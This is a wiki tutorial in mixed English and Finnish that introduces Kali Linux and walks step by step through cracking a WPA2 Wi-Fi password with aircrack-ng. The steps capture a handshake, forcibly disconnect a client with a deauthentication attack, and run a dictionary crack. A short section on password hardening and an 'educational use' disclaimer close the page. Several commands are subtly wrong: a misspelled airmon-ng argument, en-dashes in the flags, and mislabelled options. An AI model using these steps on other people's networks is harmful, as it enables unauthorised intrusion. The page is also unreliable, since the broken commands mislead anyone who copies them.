Mainos / Advertisement:

Kali Linux

Kohteesta Taisto
Versio hetkellä 28. tammikuuta 2015 kello 20.15 – tehnyt Frans (keskustelu | muokkaukset) (Ak: Uusi sivu: 6. Begin with the actual cracking)
Siirry navigaatioon Siirry hakuun
Muut kielet:
English • ‎suomi

Kali Linux is a Debian-derived Linux distribution with focus on digital forensics and penetration testing.

Kali Linux contains for example password cracking software and WLAN cracking software (aircrack-ng).

These instructions are for ""educational use"".

Installation

Download Kali Linux http://www.kali.org/downloads/, we recommend downloading it via torrent for improved speed.

Installing Kali Linux is very similar to Debian installation.

Packages

List of packages that you can use to test your security. The point of these instructions is to demonstrate how easy it can be to crack into different kinds of systems and to help you improve your security.

NOTE! Cracking into your own systems is legal and moral. Cracking into the systems of other people without their consent is forbidden.

Don't be a script kiddy

aircrack-ng

This package is used to crack WLAN networks.


1. We open terminal in root

2. We specify the wireless NIC

 airmon-ng starts wlan0

3. This command lists all the WLAN networks near you

 airodump-ng mon0

4. Now we focus on a certain access point and wait for it to connect with it

 airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
  • bssid= MAC address of the access point
  • write WPAcrack = Directory where it will write to -> root of your home folder

5. Leave the current terminal window open in the background and open a new one

 aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
  • --deauth 100 = Sever the connection 100 times
  • -a 00:14:BF:E0:E8:D5 = BSSID from the access point
  • -c 4C:EB:42:59:DE:31 = BSSID from the client device

If error

 Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1
 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

run command (shut down service)

 /etc/init.d/network-manager stop

Soon the other terminal window will print WPA handshake: 00:14:BF:E0:E8:D5

6. Begin with the actual cracking

 aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [source/*.cap]

Esimerkiksi:

 aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
  • WPAcrack-01.cap = Tiedosto jossa on hash salasanasta
  • /usr/share/wordlist/* = polku salasana tiedostoon

Sitten vain odotetaan että hash on purettu.

Tulostuu KEY FOUND: [salasanasi]


Paranna WLAN verkkosi tietoturvaa

Salauksena ehdottomasti vähintään WPA2-PSK / WPA2-PERSONAL. Tämä kuitenkin on juuri ohjeemme mukaisesti murrettavissa.

  • käyttämällä pitkää, yli 8 merkkistä salasanaa
  • Isoja ja pieniä kirjaimia
  • erikoismerkkejä
  • numeroita
  • ei ole mikään sana tai lause

Lähteet

http://www.kali.org/

http://fi.wikipedia.org/wiki/Kali_Linux

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/

http://sarajarvi.org/tutoriaalit-wpa-murto/

Mainos / Advertisement: